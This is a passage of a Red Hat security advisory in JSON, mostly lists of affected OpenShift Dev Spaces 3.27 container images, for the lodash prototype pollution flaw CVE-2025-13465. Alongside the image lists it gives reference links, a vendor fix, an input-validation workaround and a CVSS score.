"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
